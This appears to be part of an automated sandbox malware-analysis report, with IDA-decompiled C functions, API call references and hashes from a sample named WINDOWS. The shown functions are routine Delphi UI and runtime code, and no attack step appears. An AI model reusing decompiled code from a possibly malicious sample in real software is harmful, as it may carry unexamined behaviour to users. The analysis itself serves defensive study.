                                                    • Associated: 00000009.00000002.337959100.000000000049B000.00000004.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000009.00000002.337978553.00000000004A5000.00000002.00000001.01000000.00000008.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_WINDOWS.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Class$InfoLongRegisterUnregisterWindow
                                                    • String ID: x,B
                                                    • API String ID: 4025006896-71347176
                                                    • Opcode ID: cebccb0ec9a9405ea43d2313997cbfa4afe76ef610b176b8fc2697447ba8c785
                                                    • Instruction ID: 5edbcaf682720338496e3359f8b598ec737c219f81609156ea6670bddb9c1a51
                                                    • Opcode Fuzzy Hash: cebccb0ec9a9405ea43d2313997cbfa4afe76ef610b176b8fc2697447ba8c785
                                                    • Instruction Fuzzy Hash: E0018E71744204BBDB00EB6AED81F9A7399EB28718F544137F904E73A1D679AC40CBAD
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 93%
                                                    			E0044E150(intOrPtr* __eax) {
                                                    				struct tagMENUITEMINFOA _v128;
                                                    				intOrPtr _v132;
                                                    				int _t16;
                                                    				intOrPtr* _t29;
                                                    				struct HMENU__* _t36;
                                                    				MENUITEMINFOA* _t37;
                                                    
                                                    				_t37 =  &_v128;
                                                    				_t29 = __eax;
                                                    				_t16 =  *0x49de44; // 0x49e744
                                                    				if( *((char*)(_t16 + 0xd)) != 0 &&  *((intOrPtr*)(__eax + 0x38)) != 0) {
                                                    					_t36 =  *((intOrPtr*)( *__eax + 0x34))();
                                                    					_t37->cbSize = 0x2c;
                                                    					_v132 = 0x10;
                                                    					_v128.hbmpUnchecked =  &(_v128.cch);
                                                    					_v128.dwItemData = 0x50;
                                                    					_t16 = GetMenuItemInfoA(_t36, 0, 0xffffffff, _t37);
                                                    					if(_t16 != 0) {
                                                    						_t16 = E0044E4D4(_t29);
                                                    						asm("sbb edx, edx");
                                                    						if(_t16 != (_v128.cbSize & 0x00006000) + 1) {
                                                    							_v128.cbSize = ((E0044E4D4(_t29) & 0x0000007f) << 0x0000000d) + ((E0044E4D4(_t29) & 0x0000007f) << 0x0000000d) * 0x00000002 | _v128 & 0xffff9fff;
                                                    							_v132 = 0x10;
                                                    							_t16 = SetMenuItemInfoA(_t36, 0, 0xffffffff, _t37);
                                                    							if(_t16 != 0) {
                                                    								return DrawMenuBar( *(_t29 + 0x38));
                                                    							}
                                                    						}
                                                    					}
                                                    				}
                                                    				return _t16;
                                                    			}

                                                    APIs
                                                    • GetMenuItemInfoA.USER32 ref: 0044E19E
                                                    • SetMenuItemInfoA.USER32(00000000,00000000,000000FF), ref: 0044E1F0
                                                    • DrawMenuBar.USER32(00000000,00000000,00000000,000000FF), ref: 0044E1FD
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.337852872.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000009.00000002.337842077.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000009.00000002.337959100.000000000049B000.00000004.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000009.00000002.337978553.00000000004A5000.00000002.00000001.01000000.00000008.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_WINDOWS.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Menu$InfoItem$Draw
                                                    • String ID: DI$P
                                                    • API String ID: 3227129158-1383934172
                                                    • Opcode ID: 47aab54365fcd0871cb6339b6fa52b1f3853022d14864fa6dad1c364d49d802f
                                                    • Instruction ID: 3c7080e089ef200bda1d0293621365d90923fd6ea2d15a2cda29d63b16e16469
                                                    • Opcode Fuzzy Hash: 47aab54365fcd0871cb6339b6fa52b1f3853022d14864fa6dad1c364d49d802f
                                                    • Instruction Fuzzy Hash: 2B1190716052006BE3109B29CC85B4A76D8BB85324F14866AF5A4CB3DAD679D844C74A
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 100%
                                                    			E00402944(void* __eax, void* __edx) {
                                                    				char _v271;
                                                    				char _v532;
                                                    				char _v534;
                                                    				char _v535;
                                                    				void* _t21;
                                                    				void* _t25;
                                                    				CHAR* _t26;
                                                    
                                                    				_t25 = __edx;
                                                    				_t21 = __eax;
                                                    				if(__eax != 0) {
                                                    					 *_t26 = 0x40;
                                                    					_v535 = 0x3a;
                                                    					_v534 = 0;
                                                    					GetCurrentDirectoryA(0x105,  &_v271);
                                                    					SetCurrentDirectoryA(_t26);
                                                    				}
                                                    				GetCurrentDirectoryA(0x105,  &_v532);
                                                    				if(_t21 != 0) {
                                                    					SetCurrentDirectoryA( &_v271);
                                                    				}
                                                    				return E00404C30(_t25, 0x105,  &_v532);
                                                    			}


                                                    APIs
                                                    • GetCurrentDirectoryA.KERNEL32(00000105,?,?,00000000,00409F51,00477B3E,00400000,00000000,0000000A,00000000,00477DAE,?,?,?,?,00000000), ref: 00402976
                                                    • SetCurrentDirectoryA.KERNEL32(?,00000105,?,?,00000000,00409F51,00477B3E,00400000,00000000,0000000A,00000000,00477DAE), ref: 0040297C
                                                    • GetCurrentDirectoryA.KERNEL32(00000105,?,?,00000000,00409F51,00477B3E,00400000,00000000,0000000A,00000000,00477DAE,?,?,?,?,00000000), ref: 0040298B
                                                    • SetCurrentDirectoryA.KERNEL32(?,00000105,?,?,00000000,00409F51,00477B3E,00400000,00000000,0000000A,00000000,00477DAE), ref: 0040299C
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.337852872.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000009.00000002.337842077.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000009.00000002.337959100.000000000049B000.00000004.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000009.00000002.337978553.00000000004A5000.00000002.00000001.01000000.00000008.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_WINDOWS.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CurrentDirectory
                                                    • String ID: :
                                                    • API String ID: 1611563598-336475711
                                                    • Opcode ID: 1249958c054fa4984ce3416e04740fefc0778df6b06032fbb527210971bdf7ac
                                                    • Instruction ID: c5c7b0dff09aeac35822bcb6cbe030b0537c54a7cf5c2cde62247dac08ae10a0
                                                    • Opcode Fuzzy Hash: 1249958c054fa4984ce3416e04740fefc0778df6b06032fbb527210971bdf7ac
                                                    • Instruction Fuzzy Hash: 7DF096662497C01EE310E6698856BDB72DC8B55304F04442EBACCD73C2E6B8894457A7
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 67%
                                                    			E004166D4(signed short* __eax, signed int __ecx, signed short* __edx, void* __edi, void* __fp0) {
                                                    				signed short* _v8;
                                                    				signed int _v12;
                                                    				char _v13;
                                                    				signed int _v16;
                                                    				signed int _v18;
                                                    				void* _v24;
                                                    				void* _v28;
                                                    				signed int _v44;
                                                    				void* __ebp;
                                                    				signed short _t136;
                                                    				signed short* _t256;
                                                    				intOrPtr _t307;
                                                    				intOrPtr _t310;
                                                    				intOrPtr _t318;
                                                    				intOrPtr _t325;
                                                    				intOrPtr _t333;
                                                    				signed int _t338;
                                                    				void* _t346;
                                                    				void* _t348;
                                                    				intOrPtr _t349;
                                                    
                                                    				_t353 = __fp0;
                                                    				_t346 = _t348;
                                                    				_t349 = _t348 + 0xffffffd8;
                                                    				_v12 = __ecx;
                                                    				_v8 = __edx;
                                                    				_t256 = __eax;
                                                    				_v13 = 1;
                                                    				_t338 =  *((intOrPtr*)(__eax));
                                                    				if((_t338 & 0x00000fff) >= 0x10f) {
                                                    					_t136 =  *_v8;
                                                    					if(_t136 != 0) {
                                                    						if(_t136 != 1) {
                                                    							if(E0041713C(_t338,  &_v24) != 0) {
                                                    								_push( &_v18);
                                                    								if( *((intOrPtr*)( *_v24 + 8))() == 0) {
                                                    									_t341 =  *_v8;
                                                    									if(( *_v8 & 0x00000fff) >= 0x10f) {
                                                    										if(E0041713C(_t341,  &_v28) != 0) {
                                                    											_push( &_v16);
                                                    											if( *((intOrPtr*)( *_v28 + 4))() == 0) {
                                                    												E0041024C(0xb);
                                                    												goto L46;
                                                    											} else {
                                                    												if( *_t256 == _v16) {
                                                    													_v13 =  *((intOrPtr*)(0x49b404 + _v12 * 2 + ( *((intOrPtr*)( *_v28 + 0x34))(_v12) & 0x0000007f) - 0x1c));
                                                    													goto L46;
                                                    												} else {
                                                    													_push( &_v44);
                                                    													L0040F318();
                                                    													_push(_t346);
                                                    													_push(0x416ab5);
                                                    													_push( *[fs:eax]);
                                                    													 *[fs:eax] = _t349;
                                                    													_t268 = _v16 & 0x0000ffff;
                                                    													E00411330( &_v44, _v16 & 0x0000ffff, _t256, __edi, __fp0);
                                                    													if(_v44 != _v16) {
                                                    														E0041015C(_t268);
                                                    													}
                                                    													_v13 =  *((intOrPtr*)(0x49b404 + _v12 * 2 + ( *((intOrPtr*)( *_v28 + 0x34))(_v12) & 0x0000007f) - 0x1c));
                                                    													_pop(_t307);
                                                    													 *[fs:eax] = _t307;
                                                    													_push(0x416ae8);
                                                    													return E004109E8( &_v44);
                                                    												}
                                                    											}
                                                    										} else {
                                                    											E0041024C(0xb);
                                                    											goto L46;
                                                    										}
                                                    									} else {
                                                    										_push( &_v44);
                                                    										L0040F318();
                                                    										_push(_t346);
                                                    										_push(0x4169ff);
                                                    										_push( *[fs:eax]);
                                                    										 *[fs:eax] = _t349;
                                                    										_t273 =  *_v8 & 0x0000ffff;
                                                    										E00411330( &_v44,  *_v8 & 0x0000ffff, _t256, __edi, __fp0);
                                                    										if( *_v8 != _v44) {
                                                    											E0041015C(_t273);
                                                    										}
                                                    										_v13 = E00416548( &_v44, _v12, _v8, _t353);
                                                    										_pop(_t310);
                                                    										 *[fs:eax] = _t310;
                                                    										_push(0x416ae8);
                                                    										return E004109E8( &_v44);
                                                    									}
                                                    								} else {
                                                    									if( *_v8 == _v18) {
                                                    										_v13 =  *((intOrPtr*)(0x49b404 + _v12 * 2 + ( *((intOrPtr*)( *_v24 + 0x34))(_v12) & 0x0000007f) - 0x1c));
                                                    										goto L46;
                                                    									} else {
                                                    										_push( &_v44);
                                                    										L0040F318();
                                                    										_push(_t346);
                                                    										_push(0x41695d);
                                                    										_push( *[fs:eax]);
                                                    										 *[fs:eax] = _t349;
                                                    										_t278 = _v18 & 0x0000ffff;
                                                    										E00411330( &_v44, _v18 & 0x0000ffff, _v8, __edi, __fp0);
                                                    										if(_v44 != _v18) {
                                                    											E0041015C(_t278);
                                                    										}
                                                    										_v13 =  *((intOrPtr*)(0x49b404 + _v12 * 2 + ( *((intOrPtr*)( *_v24 + 0x34))(_v12) & 0x0000007f) - 0x1c));
                                                    										_pop(_t318);
                                                    										 *[fs:eax] = _t318;
                                                    										_push(0x416ae8);
                                                    										return E004109E8( &_v44);
                                                    									}
                                                    								}
                                                    							} else {
                                                    								E0041024C(__ecx);
                                                    								goto L46;
                                                    							}
                                                    						} else {
                                                    							_v13 = E00416328(_v12, 2);
                                                    							goto L46;
                                                    						}
                                                    					} else {
                                                    						_v13 = E00416314(0, 1);
                                                    						goto L46;
                                                    					}
                                                    				} else {
                                                    					if(_t338 != 0) {
                                                    						if(_t338 != 1) {
                                                    							if(E0041713C( *_v8,  &_v28) != 0) {
                                                    								_push( &_v16);
                                                    								if( *((intOrPtr*)( *_v28 + 4))() == 0) {
                                                    									_push( &_v44);
                                                    									L0040F318();
                                                    									_push(_t346);
                                                    									_push(0x41686d);
                                                    									_push( *[fs:eax]);
                                                    									 *[fs:eax] = _t349;
                                                    									_t284 =  *_t256 & 0x0000ffff;
                                                    									E00411330( &_v44,  *_t256 & 0x0000ffff, _v8, __edi, __fp0);
                                                    									if((_v44 & 0x00000fff) !=  *_t256) {
                                                    										E0041015C(_t284);
                                                    									}
                                                    									_v13 = E00416548(_t256, _v12,  &_v44, _t353);
                                                    									_pop(_t325);
                                                    									 *[fs:eax] = _t325;
                                                    									_push(0x416ae8);
                                                    									return E004109E8( &_v44);
                                                    								} else {
                                                    									if( *_t256 == _v16) {
                                                    										_v13 =  *((intOrPtr*)(0x49b404 + _v12 * 2 + ( *((intOrPtr*)( *_v28 + 0x34))(_v12) & 0x0000007f) - 0x1c));
                                                    										goto L46;
                                                    									} else {
                                                    										_push( &_v44);
                                                    										L0040F318();
                                                    										_push(_t346);
                                                    										_push(0x4167df);
                                                    										_push( *[fs:eax]);
                                                    										 *[fs:eax] = _t349;
                                                    										_t289 = _v16 & 0x0000ffff;
                                                    										E00411330( &_v44, _v16 & 0x0000ffff, _t256, __edi, __fp0);
                                                    										if((_v44 & 0x00000fff) != _v16) {
                                                    											E0041015C(_t289);
                                                    										}
                                                    										_v13 =  *((intOrPtr*)(0x49b404 + _v12 * 2 + ( *((intOrPtr*)( *_v28 + 0x34))(_v12) & 0x0000007f) - 0x1c));
                                                    										_pop(_t333);
                                                    										 *[fs:eax] = _t333;
                                                    										_push(0x416ae8);
                                                    										return E004109E8( &_v44);
                                                    									}
                                                    								}
                                                    							} else {
                                                    								E0041024C(__ecx);
                                                    								goto L46;
                                                    							}
                                                    						} else {
                                                    							_v13 = E00416328(_v12, 0);
                                                    							goto L46;
                                                    						}
                                                    					} else {
                                                    						_v13 = E00416314(1, 0);
                                                    						L46:
                                                    						return _v13;
                                                    					}
                                                    				}
                                                    			}


                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.337852872.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000009.00000002.337842077.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000009.00000002.337959100.000000000049B000.00000004.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000009.00000002.337978553.00000000004A5000.00000002.00000001.01000000.00000008.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_WINDOWS.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 52380f3934db917eae4a074d51a237f82e83a3ba5d3f730a33236230b57d628b
                                                    • Instruction ID: 126fbda12782d38e062267a272fec00c664f0fd244103826fb372783f4e2cac9
                                                    • Opcode Fuzzy Hash: 52380f3934db917eae4a074d51a237f82e83a3ba5d3f730a33236230b57d628b
                                                    • Instruction Fuzzy Hash: A0D18339A00149AFCF00EF94C4819EEBBB5EF49314F5544AAE840B7355D638EEC6CB69
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 64%
                                                    			E00415454(signed short* __eax, intOrPtr __ecx, signed short* __edx, void* __edi, void* __fp0) {
                                                    				signed short* _v8;
                                                    				signed short* _v12;
                                                    				intOrPtr _v16;
                                                    				signed int _v18;
                                                    				signed int _v20;
                                                    				void* _v24;
                                                    				void* _v28;
                                                    				char _v44;
                                                    				void* __ebp;
                                                    				void* _t119;
                                                    				signed int _t207;
                                                    				intOrPtr _t216;
                                                    				intOrPtr _t217;
                                                    				intOrPtr _t250;
                                                    				intOrPtr _t255;
                                                    				intOrPtr _t259;
                                                    				intOrPtr _t264;
                                                    				intOrPtr _t268;
                                                    				void* _t271;
                                                    				void* _t273;
                                                    				intOrPtr _t274;
                                                    
                                                    				_t278 = __fp0;
                                                    				_t269 = __edi;
                                                    				_t271 = _t273;
                                                    				_t274 = _t273 + 0xffffffd8;
                                                    				_v16 = __ecx;
                                                    				_v12 = __edx;
                                                    				_v8 = __eax;
                                                    				_t204 =  *_v8;
                                                    				if(( *_v8 & 0x00000fff) >= 0x10f) {
                                                    					if(E0041713C(_t204,  &_v24) == 0) {
                                                    						E0041024C(__ecx);
                                                    					}
                                                    					_push( &_v20);
                                                    					_t216 = _v16;
                                                    					if( *((intOrPtr*)( *_v24 + 8))() == 0) {
                                                    						_t207 =  *_v12;
                                                    						if((_t207 & 0x00000fff) >= 0x10f) {
                                                    							if(E0041713C(_t207,  &_v28) != 0) {
                                                    								_push( &_v18);
                                                    								_t217 = _v16;
                                                    								if( *((intOrPtr*)( *_v28 + 4))() == 0) {
                                                    									_t119 = E0041024C(_t217);
                                                    									goto L40;
                                                    								} else {
                                                    									if( *_v8 == _v18) {
                                                    										_t119 =  *((intOrPtr*)( *_v28 + 0x2c))(_v16);
                                                    										goto L40;
                                                    									} else {
                                                    										_push( &_v44);
                                                    										L0040F318();
                                                    										_push(_t271);
                                                    										_push(0x415779);
                                                    										_push( *[fs:eax]);
                                                    										 *[fs:eax] = _t274;
                                                    										_t219 = _v18 & 0x0000ffff;
                                                    										E00411330( &_v44, _v18 & 0x0000ffff, _v8, _t269, _t278);
                                                    										E00410E14(_v8,  &_v44);
                                                    										if( *_v8 != _v18) {
                                                    											E0041015C(_t219);
                                                    										}
                                                    										_pop(_t250);
                                                    										 *[fs:eax] = _t250;
                                                    										_push(0x415780);
                                                    										return E004109E8( &_v44);
                                                    									}
                                                    								}
                                                    							} else {
                                                    								_t119 = E0041024C(_t216);
                                                    								goto L40;
                                                    							}
                                                    						} else {
                                                    							if(_t207 ==  *_v8) {
                                                    								_t119 = E004161B0(_v8, _v16, _v12);
                                                    								goto L40;
                                                    							} else {
                                                    								_push( &_v44);
                                                    								L0040F318();
                                                    								_push(_t271);
                                                    								_push(0x4156ca);
                                                    								_push( *[fs:eax]);
                                                    								 *[fs:eax] = _t274;
                                                    								_t224 =  *_v12 & 0x0000ffff;
                                                    								E00411330( &_v44,  *_v12 & 0x0000ffff, _v8, _t269, _t278);
                                                    								E00410E14(_v8,  &_v44);
                                                    								if( *_v8 !=  *_v12) {
                                                    									E0041015C(_t224);
                                                    								}
                                                    								_pop(_t255);
                                                    								 *[fs:eax] = _t255;
                                                    								_push(0x4156d1);
                                                    								return E004109E8( &_v44);
                                                    							}
                                                    						}
                                                    					} else {
                                                    						if( *_v12 == _v20) {
                                                    							_t119 =  *((intOrPtr*)( *_v24 + 0x2c))(_v16);
                                                    							goto L40;
                                                    						} else {
                                                    							_push( &_v44);
                                                    							L0040F318();
                                                    							_push(_t271);
                                                    							_push(0x41562f);
                                                    							_push( *[fs:eax]);
                                                    							 *[fs:eax] = _t274;
                                                    							_t228 = _v20 & 0x0000ffff;
                                                    							E00411330( &_v44, _v20 & 0x0000ffff, _v12, _t269, _t278);
                                                    							if(_v44 != _v20) {
                                                    								E0041015C(_t228);
                                                    							}
                                                    							 *((intOrPtr*)( *_v24 + 0x2c))(_v16);
                                                    							_pop(_t259);
                                                    							 *[fs:eax] = _t259;
                                                    							_push(0x415799);
                                                    							return E004109E8( &_v44);
                                                    						}
                                                    					}
                                                    				} else {
                                                    					if(E0041713C( *_v12,  &_v28) != 0) {
                                                    						_push( &_v18);
                                                    						if( *((intOrPtr*)( *_v28 + 4))() == 0) {
                                                    							_push( &_v44);
                                                    							L0040F318();
                                                    							_push(_t271);
                                                    							_push(0x41558f);
                                                    							_push( *[fs:eax]);
                                                    							 *[fs:eax] = _t274;
                                                    							_t234 =  *_v8 & 0x0000ffff;
                                                    							E00411330( &_v44,  *_v8 & 0x0000ffff, _v12, __edi, __fp0);
                                                    							if( *_v8 != _v44) {
                                                    								E0041015C(_t234);
                                                    							}
                                                    							E004161B0(_v8, _v16,  &_v44);
                                                    							_pop(_t264);
                                                    							 *[fs:eax] = _t264;
                                                    							_push(0x415799);
                                                    							return E004109E8( &_v44);
                                                    						} else {
                                                    							if( *_v8 == _v18) {
                                                    								_t119 =  *((intOrPtr*)( *_v28 + 0x2c))(_v16);
                                                    								goto L40;
                                                    							} else {
                                                    								_push( &_v44);
                                                    								L0040F318();
                                                    								_push(_t271);
                                                    								_push(0x415514);
                                                    								_push( *[fs:eax]);
                                                    								 *[fs:eax] = _t274;
                                                    								_t239 = _v18 & 0x0000ffff;
                                                    								E00411330( &_v44, _v18 & 0x0000ffff, _v8, __edi, __fp0);
                                                    								E00410E14(_v8,  &_v44);
                                                    								if( *_v8 != _v18) {
                                                    									E0041015C(_t239);
                                                    								}
                                                    								_pop(_t268);
                                                    								 *[fs:eax] = _t268;
                                                    								_push(0x41551b);
                                                    								return E004109E8( &_v44);
                                                    							}
                                                    						}
                                                    					} else {
                                                    						_t119 = E0041024C(__ecx);
                                                    						L40:
                                                    						return _t119;
                                                    					}
                                                    				}
                                                    			}
                                                    0x00415454
                                                    0x00415454
                                                    0x00415455
                                                    0x00415457
                                                    0x0041545b
                                                    0x0041545e
                                                    0x00415461
                                                    0x00415467
                                                    0x00415474
                                                    0x004155a5
                                                    0x004155a7
                                                    0x004155a7
                                                    0x004155af
                                                    0x004155b3
                                                    0x004155c0
                                                    0x00415650
                                                    0x0041565d
                                                    0x004156f3
                                                    0x00415702
                                                    0x00415706
                                                    0x00415713
                                                    0x00415794
                                                    0x00000000
                                                    0x00415715
                                                    0x0041571f
                                                    0x0041578f
                                                    0x00000000
                                                    0x00415721
                                                    0x00415724
                                                    0x00415725
                                                    0x0041572c
                                                    0x0041572d
                                                    0x00415732
                                                    0x00415735
                                                    0x00415738
                                                    0x00415742
                                                    0x0041574d
                                                    0x0041575c
                                                    0x0041575e
                                                    0x0041575e
                                                    0x00415765
                                                    0x00415768
                                                    0x0041576b
                                                    0x00415778
                                                    0x00415778
                                                    0x0041571f
                                                    0x004156f5
                                                    0x004156f5
                                                    0x00000000
                                                    0x004156f5
                                                    0x00415663
                                                    0x0041566c
                                                    0x004156da
                                                    0x00000000
                                                    0x0041566e
                                                    0x00415671
                                                    0x00415672
                                                    0x00415679
                                                    0x0041567a
                                                    0x0041567f
                                                    0x00415682
                                                    0x00415688
                                                    0x00415691
                                                    0x0041569c
                                                    0x004156ad
                                                    0x004156af
                                                    0x004156af
                                                    0x004156b6
                                                    0x004156b9
                                                    0x004156bc
                                                    0x004156c9
                                                    0x004156c9
                                                    0x0041566c
                                                    0x004155c6
                                                    0x004155d0
                                                    0x00415645
                                                    0x00000000
                                                    0x004155d2
                                                    0x004155d5
                                                    0x004155d6
                                                    0x004155dd
                                                    0x004155de
                                                    0x004155e3
                                                    0x004155e6
                                                    0x004155e9
                                                    0x004155f3
                                                    0x00415600
                                                    0x00415602
                                                    0x00415602
                                                    0x00415616
                                                    0x0041561b
                                                    0x0041561e
                                                    0x00415621
                                                    0x0041562e
                                                    0x0041562e
                                                    0x004155d0
                                                    0x0041547a
                                                    0x0041548a
                                                    0x00415499
                                                    0x004154aa
                                                    0x00415535
                                                    0x00415536
                                                    0x0041553d
                                                    0x0041553e
                                                    0x00415543
                                                    0x00415546
                                                    0x0041554c
                                                    0x00415555
                                                    0x00415564
                                                    0x00415566
                                                    0x00415566
                                                    0x00415574
                                                    0x0041557b
                                                    0x0041557e
                                                    0x00415581
                                                    0x0041558e
                                                    0x004154b0
                                                    0x004154ba
                                                    0x0041552a
                                                    0x00000000
                                                    0x004154bc
                                                    0x004154bf
                                                    0x004154c0
                                                    0x004154c7
                                                    0x004154c8
                                                    0x004154cd
                                                    0x004154d0
                                                    0x004154d3
                                                    0x004154dd
                                                    0x004154e8
                                                    0x004154f7
                                                    0x004154f9
                                                    0x004154f9
                                                    0x00415500
                                                    0x00415503
                                                    0x00415506
                                                    0x00415513
                                                    0x00415513
                                                    0x004154ba
                                                    0x0041548c
                                                    0x0041548c
                                                    0x00415799
                                                    0x0041579d
                                                    0x0041579d
                                                    0x0041548a

                                                    APIs
                                                    • VariantInit.OLEAUT32(?), ref: 004154C0
                                                    • VariantInit.OLEAUT32(?), ref: 004155D6
                                                      • Part of subcall function 0041713C: RtlEnterCriticalSection.KERNEL32(0049E828,?,?,?,00000000,?,00416D60,00000000,00416E06,?,?,?,?,?,004101DF,00000000), ref: 00417172
                                                      • Part of subcall function 0041713C: RtlLeaveCriticalSection.KERNEL32(0049E828,004171EB,?,0049E828,?,?,?,00000000,?,00416D60,00000000,00416E06), ref: 004171DE
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.337852872.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000009.00000002.337842077.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000009.00000002.337959100.000000000049B000.00000004.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000009.00000002.337978553.00000000004A5000.00000002.00000001.01000000.00000008.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_WINDOWS.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CriticalInitSectionVariant$EnterLeave
                                                    • String ID:
                                                    • API String ID: 2777075435-0
                                                    • Opcode ID: 911dfcfbc7a12d5b52f32f0e07c108f6710307d6a7d9ba3bae60d823c04f13e4
                                                    • Instruction ID: a24615229599b446cf83ad5ef8fc14772df329521493faa61475ffe7701a7f51
                                                    • Opcode Fuzzy Hash: 911dfcfbc7a12d5b52f32f0e07c108f6710307d6a7d9ba3bae60d823c04f13e4
                                                    • Instruction Fuzzy Hash: D8B16D79A00609EFDB00EF94C5818EDB7B5FF89714F9040A6E804A7751D738AEC5CB68
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 85%
                                                    			E0044AF00(void* __eax, void* __ebx, intOrPtr __ecx, intOrPtr __edx, void* __edi, void* __esi, int _a4, char _a8, struct tagRECT* _a12) {
                                                    				intOrPtr _v8;
                                                    				intOrPtr _v12;
                                                    				void* _v16;
                                                    				struct tagRECT _v32;
                                                    				void* _t53;
                                                    				int _t63;
                                                    				CHAR* _t65;
                                                    				void* _t76;
                                                    				void* _t78;
                                                    				int _t89;
                                                    				CHAR* _t91;
                                                    				int _t117;
                                                    				intOrPtr _t127;
                                                    				void* _t139;
                                                    				void* _t144;
                                                    				char _t153;
                                                    
                                                    				_t120 = __ecx;
                                                    				_t143 = _t144;
                                                    				_v16 = 0;
                                                    				_v12 = __ecx;
                                                    				_v8 = __edx;
                                                    				_t139 = __eax;
                                                    				_t117 = _a4;
                                                    				_push(_t144);
                                                    				_push(0x44b0e4);
                                                    				_push( *[fs:eax]);
                                                    				 *[fs:eax] = _t144 + 0xffffffe4;
                                                    				_t53 = E0044CE98(__eax);
                                                    				_t135 = _t53;
                                                    				if(_t53 != 0 && E0044E4D4(_t135) != 0) {
                                                    					if((_t117 & 0x00000000) != 0) {
                                                    						__eflags = (_t117 & 0x00000002) - 2;
                                                    						if((_t117 & 0x00000002) == 2) {
                                                    							_t117 = _t117 & 0xfffffffd;
                                                    							__eflags = _t117;
                                                    						}
                                                    					} else {
                                                    						_t117 = _t117 & 0xffffffff | 0x00000002;
                                                    					}
                                                    					_t117 = _t117 | 0x00020000;
                                                    				}
                                                    				E00404A58( &_v16, _v12);
                                                    				if((_t117 & 0x00000004) == 0) {
                                                    					L12:
                                                    					E00404DCC(_v16, 0x44b108);
                                                    					if(_t153 != 0) {
                                                    						E004256F8( *((intOrPtr*)(_v8 + 0x14)), _t120, 1, _t135, _t143, __eflags);
                                                    						__eflags =  *((char*)(_t139 + 0x3a));
                                                    						if( *((char*)(_t139 + 0x3a)) != 0) {
                                                    							_t136 =  *((intOrPtr*)(_v8 + 0xc));
                                                    							__eflags = E004250D0( *((intOrPtr*)(_v8 + 0xc))) |  *0x44b10c;
                                                    							E004250DC( *((intOrPtr*)(_v8 + 0xc)), E004250D0( *((intOrPtr*)(_v8 + 0xc))) |  *0x44b10c, _t136, _t139, _t143);
                                                    						}
                                                    						__eflags =  *((char*)(_t139 + 0x39));
                                                    						if( *((char*)(_t139 + 0x39)) != 0) {
                                                    							L24:
                                                    							_t63 = E00404C80(_v16);
                                                    							_t65 = E00404E80(_v16);
                                                    							DrawTextA(E00425C68(_v8), _t65, _t63, _a12, _t117);
                                                    							L25:
                                                    							_pop(_t127);
                                                    							 *[fs:eax] = _t127;
                                                    							_push(0x44b0eb);
                                                    							return E004049C0( &_v16);
                                                    						} else {
                                                    							__eflags = _a8;
                                                    							if(_a8 == 0) {
                                                    								OffsetRect(_a12, 1, 1);
                                                    								E00424E10( *((intOrPtr*)(_v8 + 0xc)), 0xff000014);
                                                    								_t89 = E00404C80(_v16);
                                                    								_t91 = E00404E80(_v16);
                                                    								DrawTextA(E00425C68(_v8), _t91, _t89, _a12, _t117);
                                                    								OffsetRect(_a12, 0xffffffff, 0xffffffff);
                                                    							}
                                                    							__eflags = _a8;
                                                    							if(_a8 == 0) {
                                                    								L23:
                                                    								E00424E10( *((intOrPtr*)(_v8 + 0xc)), 0xff000010);
                                                    							} else {
                                                    								_t76 = E00424950(0xff00000d);
                                                    								_t78 = E00424950(0xff000010);
                                                    								__eflags = _t76 - _t78;
                                                    								if(_t76 != _t78) {
                                                    									goto L23;
                                                    								}
                                                    								E00424E10( *((intOrPtr*)(_v8 + 0xc)), 0xff000014);
                                                    							}
                                                    							goto L24;
                                                    						}
                                                    					}
                                                    					if((_t117 & 0x00000004) == 0) {
                                                    						asm("movsd");
                                                    						asm("movsd");
                                                    						asm("movsd");
                                                    						asm("movsd");
                                                    						_v32.top = _v32.top + 4;
                                                    						DrawEdge(E00425C68(_v8),  &_v32, 6, 2);
                                                    					}
                                                    					goto L25;
                                                    				} else {
                                                    					if(_v16 == 0) {
                                                    						L11:
                                                    						E00404C88( &_v16, 0x44b0fc);
                                                    						goto L12;
                                                    					}
                                                    					if( *_v16 != 0x26) {
                                                    						goto L12;
                                                    					}
                                                    					_t153 =  *((char*)(_v16 + 1));
                                                    					if(_t153 != 0) {
                                                    						goto L12;
                                                    					}
                                                    					goto L11;
                                                    				}
